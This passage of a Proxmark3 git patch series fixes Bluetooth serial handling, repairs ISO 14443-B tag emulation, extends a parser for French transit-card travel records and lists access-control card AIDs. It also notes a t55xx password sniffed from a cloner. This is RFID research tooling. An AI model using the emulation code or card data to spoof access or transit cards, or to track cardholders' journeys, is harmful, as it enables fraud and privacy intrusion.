ContractMediumEndDate - EventDateStamp + DateAdjust)).strftime('%Y-%m-%d'))); - EventTimeStamp = Usage_Data.nom(11) - print(' EventTimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) - print(' unk2... :', Usage_Data.nom_bits(23)); + if not Usage_B_DAT.isEmpty(): + print() + print('USAGE_B') + Describe_Usage(Usage_B_DAT, ContractMediumEndDate, Usage_B_CER) + return 0 From 3e1bd8f50a71b42021f75f5a89dbd5ba9c247fe3 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Tue, 11 Jun 2024 14:32:35 +0200 Subject: [PATCH 047/112] the BT serial port setup on Windows didnt work properly. By adding the baud rate in the new termios settings the issue seem to be fixed. Also added some extra flushing calls and some more configuration settings for chars. --- CHANGELOG.md | 2 ++ client/src/comms.c | 23 ++++++++++++++++++++--- client/src/uart/uart_posix.c | 27 ++++++++++++++++++++++++--- 3 files changed, 46 insertions(+), 6 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 56dba3d3c..fbc7d0d93 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -3,6 +3,8 @@ All notable changes to this project will be documented in this file. This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log... ## [unreleased][unreleased] +- Fixed BT serial comms (@iceman1001) +- Changed `intertic.py` - updated and code clean up (@gentilkiwi) - Added `pm3_tears_for_fears.py` - a ISO14443b tear off script by Pierre Granier - Added new t55xx password (002BCFCF) sniffed from cheap cloner (@davidbeauchamp) diff --git a/client/src/comms.c b/client/src/comms.c index 90493dae0..091f51d86 100644 --- a/client/src/comms.c +++ b/client/src/comms.c @@ -161,8 +161,9 @@ static void SendCommandNG_internal(uint16_t cmd, uint8_t *data, size_t len, bool txBufferNG.pre.ng = ng; txBufferNG.pre.length = len; txBufferNG.pre.cmd = cmd; - if (len > 0 && data) + if (len > 0 && data) { memcpy(&txBufferNG.data, data, len); + } if ((g_conn.send_via_fpc_usart && g_conn.send_with_crc_on_fpc) || ((!g_conn.send_via_fpc_usart) && g_conn.send_with_crc_on_usb)) { uint8_t first = 0, second = 0; @@ -474,12 +475,15 @@ __attribute__((force_align_arg_pointer)) res = uart_receive(sp, (uint8_t *)&rx_raw.pre, sizeof(PacketResponseNGPreamble), &rxlen); if ((res == PM3_SUCCESS) && (rxlen == sizeof(PacketResponseNGPreamble))) { + rx.magic = rx_raw.pre.magic; uint16_t length = rx_raw.pre.length; rx.ng = rx_raw.pre.ng; rx.status = rx_raw.pre.status; rx.cmd = rx_raw.pre.cmd; + if (rx.magic == RESPONSENG_PREAMBLE_MAGIC) { // New style NG reply + if (length > PM3_CMD_DATA_SIZE) { PrintAndLogEx(WARNING, "Received packet frame with incompatible length: 0x%04x", length); error = true; @@ -488,30 +492,38 @@ __attribute__((force_align_arg_pointer)) if ((!error) && (length > 0)) { // Get the variable length payload res = uart_receive(sp, (uint8_t *)&rx_raw.data, length, &rxlen); + if ((res != PM3_SUCCESS) || (rxlen != length)) { + PrintAndLogEx(WARNING, "Received packet frame with variable part too short? %d/%d", rxlen, length); error = true; + } else { if (rx.ng) { // Received a valid NG frame + memcpy(&rx.data, &rx_raw.data, length); rx.length = length; if ((rx.cmd == g_conn.last_command) && (rx.status == PM3_SUCCESS)) { ACK_received = true; } + } else { uint64_t arg[3]; if (length < sizeof(arg)) { PrintAndLogEx(WARNING, "Received MIX packet frame with incompatible length: 0x%04x", length); error = true; } + if (!error) { // Received a valid MIX frame + memcpy(arg, &rx_raw.data, sizeof(arg)); rx.oldarg[0] = arg[0]; rx.oldarg[1] = arg[1]; rx.oldarg[2] = arg[2]; memcpy(&rx.data, ((uint8_t *)&rx_raw.data) + sizeof(arg), length - sizeof(arg)); rx.length = length - sizeof(arg); + if (rx.cmd == CMD_ACK) { ACK_received = true; } @@ -519,12 +531,14 @@ __attribute__((force_align_arg_pointer)) } } } else if ((!error) && (length == 0)) { // we received an empty frame - if (rx.ng) + + if (rx.ng) { rx.length = 0; // set received length to 0 - else { // old frames can't be empty + } else { // old frames can't be empty PrintAndLogEx(WARNING, "Received empty MIX packet frame (length: 0x00)"); error = true; } + } if (!error) { // Get the postamble @@ -537,9 +551,12 @@ __attribute__((force_align_arg_pointer)) if (!error) { // Check CRC, accept MAGIC as placeholder rx.crc = rx_raw.foopost.crc; + if (rx.crc != RESPONSENG_POSTAMBLE_MAGIC) { + uint8_t first, second; compute_crc(CRC_14443_A, (uint8_t *)&rx_raw, sizeof(PacketResponseNGPreamble) + length, &first, &second); + if ((first << 8) + second != rx.crc) { PrintAndLogEx(WARNING, "Received packet frame with invalid CRC %02X%02X <> %04X", first, second, rx.crc); error = true; diff --git a/client/src/uart/uart_posix.c b/client/src/uart/uart_posix.c index 0863cc9b7..a83617d7b 100644 --- a/client/src/uart/uart_posix.c +++ b/client/src/uart/uart_posix.c @@ -387,11 +387,15 @@ serial_port uart_open(const char *pcPortName, uint32_t speed, bool slient) { return INVALID_SERIAL_PORT; } + // Flush all lingering data that may exist + tcflush(sp->fd, TCIOFLUSH); + // Duplicate the (old) terminal info struct sp->tiNew = sp->tiOld; - // Configure the serial port - sp->tiNew.c_cflag = CS8 | CLOCAL | CREAD; + // Configure the serial port. + // fix: default to 115200 here seems to fix the white dongle issue. Will need to check proxbuilds later. + sp->tiNew.c_cflag = B115200 | CS8 | CLOCAL | CREAD; sp->tiNew.c_iflag = IGNPAR; sp->tiNew.c_oflag = 0; sp->tiNew.c_lflag = 0; @@ -401,6 +405,18 @@ serial_port uart_open(const char *pcPortName, uint32_t speed, bool slient) { // Block until a timer expires (n * 100 mSec.) sp->tiNew.c_cc[VTIME] = 0; + // more configurations + sp->tiNew.c_cc[VINTR] = 0; /* Ctrl-c */ + sp->tiNew.c_cc[VQUIT] = 0; /* Ctrl-\ */ + sp->tiNew.c_cc[VERASE] = 0; /* del */ + sp->tiNew.c_cc[VKILL] = 0; /* @ */ + sp->tiNew.c_cc[VEOF] = 4; /* Ctrl-d */ + sp->tiNew.c_cc[VSWTC] = 0; /* '\0' */ + sp->tiNew.c_cc[VSTART] = 0; /* Ctrl-q */ + sp->tiNew.c_cc[VSTOP] = 0; /* Ctrl-s */ + sp->tiNew.c_cc[VSUSP] = 0; /* Ctrl-z */ + sp->tiNew.c_cc[VEOL] = 0; /* '\0' */ + // Try to set the new terminal info struct if (tcsetattr(sp->fd, TCSANOW, &sp->tiNew) == -1) { PrintAndLogEx(ERR, "error: UART set terminal info attribute"); @@ -695,9 +711,14 @@ bool uart_set_speed(serial_port sp, const uint32_t uiPortSpeed) { // Set port speed (Input and Output) cfsetispeed(&ti, stPortSpeed); cfsetospeed(&ti, stPortSpeed); + + // flush + tcflush(spu->fd, TCIOFLUSH); + bool result = tcsetattr(spu->fd, TCSANOW, &ti) != -1; - if (result) + if (result) { g_conn.uart_speed = uiPortSpeed; + } return result; } From 8209440a54e0fe751b3dc8f5184e3448ebcbd4a4 Mon Sep 17 00:00:00 2001 From: Michael Jung Date: Tue, 11 Jun 2024 18:54:01 +0200 Subject: [PATCH 048/112] Fix ISO 14443-B tag simulation See https://github.com/RfidResearchGroup/proxmark3/issues/1652 - Fix Bit Coding PICC -> PCD: Encoding for 0 and 1 bits were reversed. - Add a frontend delay for TR0 (No subcarrier) in TransmitFor14443b_AsTag. - Remove unconditionally prefixing the encoded data with two '1' bits. - Improve the Type B PICC State Machine implementation. With these improvements my PCD can read the ISO 14443-B tag emulated by a Proxmark3 Easy. Signed-off-by: Michael Jung --- CHANGELOG.md | 1 + armsrc/iso14443b.c | 166 +++++++++++++++++++++++++-------------------- armsrc/iso14443b.h | 10 ++- 3 files changed, 98 insertions(+), 79 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index fbc7d0d93..6f58a28f1 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -7,6 +7,7 @@ This project uses the changelog in accordance with [keepchangelog](http://keepac - Changed `intertic.py` - updated and code clean up (@gentilkiwi) - Added `pm3_tears_for_fears.py` - a ISO14443b tear off script by Pierre Granier - Added new t55xx password (002BCFCF) sniffed from cheap cloner (@davidbeauchamp) +- Fixed 'hf 14b sim' - now works (@michi-jung) ## [Aurora.4.18589][2024-05-28] - Fixed the pm3 regressiontests for Hitag2Crack (@iceman1001) diff --git a/armsrc/iso14443b.c b/armsrc/iso14443b.c index a802f6282..604920e45 100644 --- a/armsrc/iso14443b.c +++ b/armsrc/iso14443b.c @@ -186,7 +186,7 @@ #endif // 4sample -#define SEND4STUFFBIT(x) tosend_stuffbit(x);tosend_stuffbit(x);tosend_stuffbit(x);tosend_stuffbit(x); +#define SEND4STUFFBIT(x) tosend_stuffbit(!(x));tosend_stuffbit(!(x));tosend_stuffbit(!(x));tosend_stuffbit(!(x)); static void iso14b_set_timeout(uint32_t timeout_etu); static void iso14b_set_maxframesize(uint16_t size); @@ -702,10 +702,11 @@ static void TransmitFor14443b_AsTag(const uint8_t *response, uint16_t len) { // Signal field is off with the appropriate LED LED_D_OFF(); + // TR0: min - 1024 cycles = 75.52 us - max 4096 cycles = 302.08 us + SpinDelayUs(76); + // Modulate BPSK FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_SIMULATOR | FPGA_HF_SIMULATOR_MODULATE_BPSK); - AT91C_BASE_SSC->SSC_THR = 0xFF; - FpgaSetupSsc(FPGA_MAJOR_MODE_HF_SIMULATOR); // Transmit the response. for (uint16_t i = 0; i < len;) { @@ -713,6 +714,11 @@ static void TransmitFor14443b_AsTag(const uint8_t *response, uint16_t len) { // Put byte into tx holding register as soon as it is ready if (AT91C_BASE_SSC->SSC_SR & AT91C_SSC_TXRDY) { AT91C_BASE_SSC->SSC_THR = response[i++]; + + // Start-up SSC once first byte is in SSC_THR + if (i == 1) { + FpgaSetupSsc(FPGA_MAJOR_MODE_HF_SIMULATOR); + } } } } @@ -771,7 +777,7 @@ void SimulateIso14443bTag(const uint8_t *pupi) { static const uint8_t respOK[] = {0x00, 0x78, 0xF0}; uint16_t len, cmdsReceived = 0; - int cardSTATE = SIM_NOFIELD; + int cardSTATE = SIM_POWER_OFF; int vHf = 0; // in mV const tosend_t *ts = get_tosend(); @@ -801,16 +807,18 @@ void SimulateIso14443bTag(const uint8_t *pupi) { } // find reader field - if (cardSTATE == SIM_NOFIELD) { - - vHf = (MAX_ADC_HF_VOLTAGE * SumAdc(ADC_CHAN_HF, 32)) >> 15; - if (vHf > MF_MINFIELDV) { + vHf = (MAX_ADC_HF_VOLTAGE * SumAdc(ADC_CHAN_HF, 32)) >> 15; + if (vHf > MF_MINFIELDV) { + if (cardSTATE == SIM_POWER_OFF) { cardSTATE = SIM_IDLE; LED_A_ON(); } + } else { + cardSTATE = SIM_POWER_OFF; + LED_A_OFF(); } - if (cardSTATE == SIM_NOFIELD) { + if (cardSTATE == SIM_POWER_OFF) { continue; } @@ -820,73 +828,85 @@ void SimulateIso14443bTag(const uint8_t *pupi) { break; } - // ISO14443-B protocol states: - // REQ or WUP request in ANY state - // WUP in HALTED state - if (len == 5) { - if (((receivedCmd[0] == ISO14443B_REQB) && ((receivedCmd[2] & 0x08) == 0x08) && (cardSTATE == SIM_HALTED)) || - (receivedCmd[0] == ISO14443B_REQB)) { + LogTrace(receivedCmd, len, 0, 0, NULL, true); - LogTrace(receivedCmd, len, 0, 0, NULL, true); - cardSTATE = SIM_SELECTING; - } - } - - /* - * How should this flow go? - * REQB or WUPB - * send response ( waiting for Attrib) - * ATTRIB - * send response ( waiting for commands 7816) - * HALT - send halt response ( waiting for wupb ) - */ - - switch (cardSTATE) { - //case SIM_NOFIELD: - case SIM_HALTED: - case SIM_IDLE: { - LogTrace(receivedCmd, len, 0, 0, NULL, true); - break; - } - case SIM_SELECTING: { - TransmitFor14443b_AsTag(encodedATQB, encodedATQBLen); - LogTrace(respATQB, sizeof(respATQB), 0, 0, NULL, false); - cardSTATE = SIM_WORK; - break; - } - case SIM_HALTING: { - TransmitFor14443b_AsTag(encodedOK, encodedOKLen); - LogTrace(respOK, sizeof(respOK), 0, 0, NULL, false); - cardSTATE = SIM_HALTED; - break; - } - case SIM_ACKNOWLEDGE: { - TransmitFor14443b_AsTag(encodedOK, encodedOKLen); - LogTrace(respOK, sizeof(respOK), 0, 0, NULL, false); - cardSTATE = SIM_IDLE; - break; - } - case SIM_WORK: { - if (len == 7 && receivedCmd[0] == ISO14443B_HALT) { - cardSTATE = SIM_HALTED; - } else if (len == 11 && receivedCmd[0] == ISO14443B_ATTRIB) { - cardSTATE = SIM_ACKNOWLEDGE; - } else { - // Todo: - // - SLOT MARKER - // - ISO7816 - // - emulate with a memory dump - if (g_dbglevel >= DBG_DEBUG) { - Dbprintf("new cmd from reader: len=%d, cmdsRecvd=%d", len, cmdsReceived); - } - - cardSTATE = SIM_IDLE; + if ((len == 5) && (receivedCmd[0] == ISO14443B_REQB) && (receivedCmd[2] & 0x08)) { + // WUPB + switch (cardSTATE) { + case SIM_IDLE: + case SIM_READY: + case SIM_HALT: { + TransmitFor14443b_AsTag(encodedATQB, encodedATQBLen); + LogTrace(respATQB, sizeof(respATQB), 0, 0, NULL, false); + cardSTATE = SIM_READY; + break; + } + case SIM_ACTIVE: + default: { + TransmitFor14443b_AsTag(encodedATQB, encodedATQBLen); + LogTrace(respATQB, sizeof(respATQB), 0, 0, NULL, false); + break; } - break; } - default: { - break; + } else if ((len == 5) && (receivedCmd[0] == ISO14443B_REQB) && !(receivedCmd[2] & 0x08)) { + // REQB + switch (cardSTATE) { + case SIM_IDLE: + case SIM_READY: { + TransmitFor14443b_AsTag(encodedATQB, encodedATQBLen); + LogTrace(respATQB, sizeof(respATQB), 0, 0, NULL, false); + cardSTATE = SIM_READY; + break; + } + case SIM_ACTIVE: { + TransmitFor14443b_AsTag(encodedATQB, encodedATQBLen); + LogTrace(respATQB, sizeof(respATQB), 0, 0, NULL, false); + break; + } + case SIM_HALT: + default: { + break; + } + } + } else if ((len == 7) && (receivedCmd[0] == ISO14443B_HALT)) { + // HLTB + switch (cardSTATE) { + case SIM_READY: { + TransmitFor14443b_AsTag(encodedOK, encodedOKLen); + LogTrace(respOK, sizeof(respOK), 0, 0, NULL, false); + cardSTATE = SIM_HALT; + break; + } + case SIM_IDLE: + case SIM_ACTIVE: { + TransmitFor14443b_AsTag(encodedOK, encodedOKLen); + LogTrace(respOK, sizeof(respOK), 0, 0, NULL, false); + break; + } + case SIM_HALT: + default: { + break; + } + } + } else if (len == 11 && receivedCmd[0] == ISO14443B_ATTRIB) { + // ATTRIB + switch (cardSTATE) { + case SIM_READY: { + TransmitFor14443b_AsTag(encodedOK, encodedOKLen); + LogTrace(respOK, sizeof(respOK), 0, 0, NULL, false); + cardSTATE = SIM_ACTIVE; + break; + } + case SIM_IDLE: + case SIM_ACTIVE: { + TransmitFor14443b_AsTag(encodedOK, encodedOKLen); + LogTrace(respOK, sizeof(respOK), 0, 0, NULL, false); + break; + } + case SIM_HALT: + default: { + break; + } } } diff --git a/armsrc/iso14443b.h b/armsrc/iso14443b.h index 8e58942fb..70455ac15 100644 --- a/armsrc/iso14443b.h +++ b/armsrc/iso14443b.h @@ -49,12 +49,10 @@ void SniffIso14443b(void); void SendRawCommand14443B(iso14b_raw_cmd_t *p); // States for 14B SIM command -#define SIM_NOFIELD 0 +#define SIM_POWER_OFF 0 #define SIM_IDLE 1 -#define SIM_HALTED 2 -#define SIM_SELECTING 3 -#define SIM_HALTING 4 -#define SIM_ACKNOWLEDGE 5 -#define SIM_WORK 6 +#define SIM_READY 2 +#define SIM_HALT 3 +#define SIM_ACTIVE 4 #endif /* __ISO14443B_H */ From 283a3e44ed22bc10d7e5b4e15f96350f04427daf Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Wed, 12 Jun 2024 12:28:02 +0200 Subject: [PATCH 049/112] remove missing usage of define --- client/src/uart/uart_posix.c | 1 - 1 file changed, 1 deletion(-) diff --git a/client/src/uart/uart_posix.c b/client/src/uart/uart_posix.c index a83617d7b..5e7133354 100644 --- a/client/src/uart/uart_posix.c +++ b/client/src/uart/uart_posix.c @@ -411,7 +411,6 @@ serial_port uart_open(const char *pcPortName, uint32_t speed, bool slient) { sp->tiNew.c_cc[VERASE] = 0; /* del */ sp->tiNew.c_cc[VKILL] = 0; /* @ */ sp->tiNew.c_cc[VEOF] = 4; /* Ctrl-d */ - sp->tiNew.c_cc[VSWTC] = 0; /* '\0' */ sp->tiNew.c_cc[VSTART] = 0; /* Ctrl-q */ sp->tiNew.c_cc[VSTOP] = 0; /* Ctrl-s */ sp->tiNew.c_cc[VSUSP] = 0; /* Ctrl-z */ From ceddabcc983f4f9c3a36f2b5595ebc93b22ff9c2 Mon Sep 17 00:00:00 2001 From: Benjamin DELPY Date: Fri, 14 Jun 2024 22:23:15 +0200 Subject: [PATCH 050/112] Update intertic.py to support more USAGE parsing Signed-off-by: Benjamin DELPY --- client/pyscripts/intertic.py | 139 ++++++++++++++++++++++++++++++----- 1 file changed, 121 insertions(+), 18 deletions(-) diff --git a/client/pyscripts/intertic.py b/client/pyscripts/intertic.py index bd1582b36..fdb5ff081 100644 --- a/client/pyscripts/intertic.py +++ b/client/pyscripts/intertic.py @@ -55,6 +55,35 @@ class BitMe: A generic Describe_Usage function with variable number of bits between stamps will be more optimal At this time I want to keep more places/functions to try to parse other fields in 'unk1' and 'left' ''' + +TYPE_EventCode_Nature = { + 0x1: 'urban bus', + 0x2: 'interurban bus', + 0x3: 'metro', + 0x4: 'tramway', + 0x5: 'train', + 0x8: 'parking', +} + +TYPE_EventCode_Type = { + 0x1: 'entry validation', + 0x2: 'exit validation', + 0x4: 'ticket inspecting', + 0x6: 'connection entry validation', + 0x14: 'test validation', + 0x15: 'connection exit validation', + 0x16: 'canceled validation', + 0x17: 'invalidation', + 0x18: 'distribution', +} + +TYPE_EventGeoRoute_Direction = { + 0: 'undefined', + 1: 'outward', + 2: 'inward', + 3: 'circular', +} + def Describe_Usage_1(Usage, ContractMediumEndDate, Certificate): EventDateStamp = Usage.nom(10) EventTimeStamp = Usage.nom(11) @@ -67,19 +96,93 @@ def Describe_Usage_1(Usage, ContractMediumEndDate, Certificate): print(' EventValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60)) print(' left... :', Usage.nom_bits_left()); print(' [CER] Usage : {:04x}'.format(Certificate.nom(16))) + +def Describe_Usage_1_1(Usage, ContractMediumEndDate, Certificate): + EventDateStamp = Usage.nom(10) + EventTimeStamp = Usage.nom(11) + unk0 = Usage.nom_bits(8) + EventCode_Nature = Usage.nom(5) + EventCode_Type = Usage.nom(5) + unk1 = Usage.nom_bits(11) + EventGeoVehicleId = Usage.nom(16) + EventGeoRouteId = Usage.nom(14) + EventGeoRoute_Direction = Usage.nom(2) + EventCountPassengers_mb = Usage.nom(4) + EventValidityTimeFirstStamp = Usage.nom(11) + print(' DateStamp : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d'))); + print(' TimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) + print(' unk0... :', unk0); + print(' Code/Nature : 0x{:x} ({})'.format(EventCode_Nature, TYPE_EventCode_Nature.get(EventCode_Nature, '?'))) + print(' Code/Type : 0x{:x} ({})'.format(EventCode_Type, TYPE_EventCode_Type.get(EventCode_Type, '?'))) + print(' unk1... :', unk1); + print(' GeoVehicleId : {}'. format(EventGeoVehicleId)) + print(' GeoRouteId : {}'. format(EventGeoRouteId)) + print(' Direction : {} ({})'. format(EventGeoRoute_Direction, TYPE_EventGeoRoute_Direction.get(EventGeoRoute_Direction, '?'))) + print(' Passengers(?) : {}'. format(EventCountPassengers_mb)) + print(' ValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60)) + print(' left... :', Usage.nom_bits_left()); + print(' [CER] Usage : {:04x}'.format(Certificate.nom(16))) + +def Describe_Usage_1_2(Usage, ContractMediumEndDate, Certificate): + EventDateStamp = Usage.nom(10) + EventTimeStamp = Usage.nom(11) + EventCount_mb = Usage.nom(6) + unk0 = Usage.nom_bits(4) + EventCode_Nature_mb = Usage.nom(4) + EventCode_Type_mb = Usage.nom(4) + unk1 = Usage.nom_bits(11) + EventGeoVehicleId = Usage.nom(16) + EventGeoRouteId = Usage.nom(14) + EventGeoRoute_Direction = Usage.nom(2) + EventCountPassengers_mb = Usage.nom(4) + EventValidityTimeFirstStamp = Usage.nom(11) + + TYPE_EventCode_Nature_Reims = { # usually it's the opposite, but ... ? + 0x4: 'urban bus', + 0x1: 'tramway', + } + + print(' DateStamp : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d'))); + print(' TimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) + print(' Count(?) : {}'. format(EventCount_mb)) + print(' unk0... :', unk0); + print(' Code/Nature(?) : 0x{:x} ({})'.format(EventCode_Nature_mb, TYPE_EventCode_Nature_Reims.get(EventCode_Nature_mb, '?'))) + print(' Code/Type(?) : 0x{:x} ({})'.format(EventCode_Type_mb, TYPE_EventCode_Type.get(EventCode_Type_mb, '?'))) + print(' unk1... :', unk1); + print(' GeoVehicleId : {}'. format(EventGeoVehicleId)) + print(' GeoRouteId : {}'. format(EventGeoRouteId)) + print(' Direction : {} ({})'. format(EventGeoRoute_Direction, TYPE_EventGeoRoute_Direction.get(EventGeoRoute_Direction, '?'))) + print(' Passengers(?) : {}'. format(EventCountPassengers_mb)) + print(' ValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60)) + print(' left... :', Usage.nom_bits_left()); + print(' [CER] Usage : {:04x}'.format(Certificate.nom(16))) + + def Describe_Usage_2(Usage, ContractMediumEndDate, Certificate): EventDateStamp = Usage.nom(10) EventTimeStamp = Usage.nom(11) - unk = Usage.nom_bits(49) + unk0 = Usage.nom_bits(8) + EventCode_Nature = Usage.nom(5) + EventCode_Type = Usage.nom(5) + unk1 = Usage.nom_bits(11) + EventGeoRouteId = Usage.nom(14) + EventGeoRoute_Direction = Usage.nom(2) + EventCountPassengers_mb = Usage.nom(4) EventValidityTimeFirstStamp = Usage.nom(11) - print(' EventDateStamp : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d'))); - print(' EventTimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) - print(' unk1... :', unk); - print(' EventValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60)) - print(' left... :', Usage.nom_bits_left()); - print(' [CER] Usage : {:04x}'.format(Certificate.nom(16))) + print(' DateStamp : {} ({})'.format(EventDateStamp, (datetime(1997, 1, 1) + timedelta(days = ContractMediumEndDate - EventDateStamp)).strftime('%Y-%m-%d'))); + print(' TimeStamp : {} ({:02d}:{:02d})'. format(EventTimeStamp, EventTimeStamp // 60, EventTimeStamp % 60)) + print(' unk0... :', unk0); + print(' Code/Nature : 0x{:x} ({})'.format(EventCode_Nature, TYPE_EventCode_Nature.get(EventCode_Nature, '?'))) + print(' Code/Type : 0x{:x} ({})'.format(EventCode_Type, TYPE_EventCode_Type.get(EventCode_Type, '?'))) + print(' unk1... :', unk1); + print(' GeoRouteId : {}'. format(EventGeoRouteId)) + print(' Direction : {} ({})'. format(EventGeoRoute_Direction, TYPE_EventGeoRoute_Direction.get(EventGeoRoute_Direction, '?'))) + print(' Passengers(?) : {}'. format(EventCountPassengers_mb)) + print(' ValidityTimeFirstStamp: {} ({:02d}:{:02d})'. format(EventValidityTimeFirstStamp, EventValidityTimeFirstStamp // 60, EventValidityTimeFirstStamp % 60)) + print(' left... :', Usage.nom_bits_left()); + print(' [CER] Usage : {:04x}'.format(Certificate.nom(16))) def Describe_Usage_3(Usage, ContractMediumEndDate, Certificate): EventDateStamp = Usage.nom(10) @@ -127,29 +230,29 @@ ISO_Countries = { FRA_OrganizationalAuthority_Contract_Provider = { 0x000: { - 5: InterticHelper('Lille', 'Ilévia / Keolis', Describe_Usage_1), - 7: InterticHelper('Lens-Béthune', 'Tadao / Transdev', Describe_Usage_1), + 5: InterticHelper('Lille', 'Ilévia / Keolis', Describe_Usage_1_1), + 7: InterticHelper('Lens-Béthune', 'Tadao / Transdev', Describe_Usage_1_1), }, 0x006: { 1: InterticHelper('Amiens', 'Ametis / Keolis'), }, 0x008: { - 15: InterticHelper('Angoulême', 'STGA', Describe_Usage_1), + 15: InterticHelper('Angoulême', 'STGA', Describe_Usage_1_1), # May have a problem with date ? }, 0x021: { - 1: InterticHelper('Bordeaux', 'TBM / Keolis', Describe_Usage_1), + 1: InterticHelper('Bordeaux', 'TBM / Keolis', Describe_Usage_1_1), }, 0x057: { - 1: InterticHelper('Lyon', 'TCL / Keolis', Describe_Usage_1), + 1: InterticHelper('Lyon', 'TCL / Keolis', Describe_Usage_1), # Strange usage ?, kept on generic 1 }, 0x072: { - 1: InterticHelper('Tours', 'filbleu / Keolis', Describe_Usage_1), + 1: InterticHelper('Tours', 'filbleu / Keolis', Describe_Usage_1_1), }, 0x078: { - 4: InterticHelper('Reims', 'Citura / Transdev', Describe_Usage_1), + 4: InterticHelper('Reims', 'Citura / Transdev', Describe_Usage_1_2), }, 0x091: { - 1: InterticHelper('Strasbourg', 'CTS', Describe_Usage_4), + 1: InterticHelper('Strasbourg', 'CTS', Describe_Usage_4), # More dump needed, not only tram ! }, 0x502: { 83: InterticHelper('Annecy', 'Sibra', Describe_Usage_2), @@ -160,20 +263,20 @@ FRA_OrganizationalAuthority_Contract_Provider = { }, 0x908: { 1: InterticHelper('Rennes', 'STAR / Keolis', Describe_Usage_2), - 8: InterticHelper('Saint-Malo', 'MAT / RATP'), + 8: InterticHelper('Saint-Malo', 'MAT / RATP', Describe_Usage_1_1), }, 0x911: { 5: InterticHelper('Besançon', 'Ginko / Keolis'), }, 0x912: { - 3: InterticHelper('Le Havre', 'Lia / Transdev', Describe_Usage_1), + 3: InterticHelper('Le Havre', 'Lia / Transdev', Describe_Usage_1_1), 35: InterticHelper('Cherbourg-en-Cotentin', 'Cap Cotentin / Transdev'), }, 0x913: { 3: InterticHelper('Nîmes', 'Tango / Transdev', Describe_Usage_3), }, 0x917: { - 4: InterticHelper('Angers', 'Irigo / RATP', Describe_Usage_1), + 4: InterticHelper('Angers', 'Irigo / RATP', Describe_Usage_1_2), 7: InterticHelper('Saint-Nazaire', 'Stran'), }, } From 39639c803c651c11d3c94e72f849f8b1d36abf88 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Sat, 15 Jun 2024 20:36:11 +0200 Subject: [PATCH 051/112] fix a wrong size when clearning allocated memory --- CHANGELOG.md | 1 + armsrc/spiffs.c | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 6f58a28f1..98797cc01 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -3,6 +3,7 @@ All notable changes to this project will be documented in this file. This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log... ## [unreleased][unreleased] +- Fixed a bad memory erase (@iceman1001) - Fixed BT serial comms (@iceman1001) - Changed `intertic.py` - updated and code clean up (@gentilkiwi) - Added `pm3_tears_for_fears.py` - a ISO14443b tear off script by Pierre Granier diff --git a/armsrc/spiffs.c b/armsrc/spiffs.c index fbbf95672..7604f6db7 100644 --- a/armsrc/spiffs.c +++ b/armsrc/spiffs.c @@ -646,7 +646,7 @@ void rdv40_spiffs_safe_print_tree(void) { SPIFFS_opendir(&fs, "/", &d); while ((pe = SPIFFS_readdir(&d, pe))) { - memset(resolvedlink, 0, sizeof(resolvedlink)); + memset(resolvedlink, 0, 11 + SPIFFS_OBJ_NAME_LEN); if (rdv40_spiffs_is_symlink((const char *)pe->name)) { From d2c5c99f053455bd8012150263b27fcd4cfdca48 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Tue, 18 Jun 2024 23:34:53 +1000 Subject: [PATCH 052/112] Updated aid_desfire.json Used Notepad++ to make offline edits to avoid making further unnecessary commits. Duplicate AIDs were removed. AID Country, Name, Description, and Type were clarified where publicly-available information existed. AIDs are now in category order, then further sorted by hexadecimal order. Style Guide adhered to where possible; some Descriptions may need truncating, however. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/resources/aid_desfire.json | 794 +++++++++++++++--------------- 1 file changed, 389 insertions(+), 405 deletions(-) diff --git a/client/resources/aid_desfire.json b/client/resources/aid_desfire.json index a147643d2..986aac08a 100644 --- a/client/resources/aid_desfire.json +++ b/client/resources/aid_desfire.json @@ -7,11 +7,59 @@ "Description": "FID 03: Capability Container", "Type": "ndef" }, + { + "AID": "000357", + "Vendor": "LEGIC", + "Country": "DE", + "Name": "Legic", + "Description": "FID 02: EF-CONF", + "Type": "pacs" + }, + { + "AID": "2081F4", + "Vendor": "Gallagher", + "Country": "NZ", + "Name": "Access Control", + "Description": "Cardax Card Data Application", + "Type": "pacs" + }, + { + "AID": "2F81F4", + "Vendor": "Gallagher", + 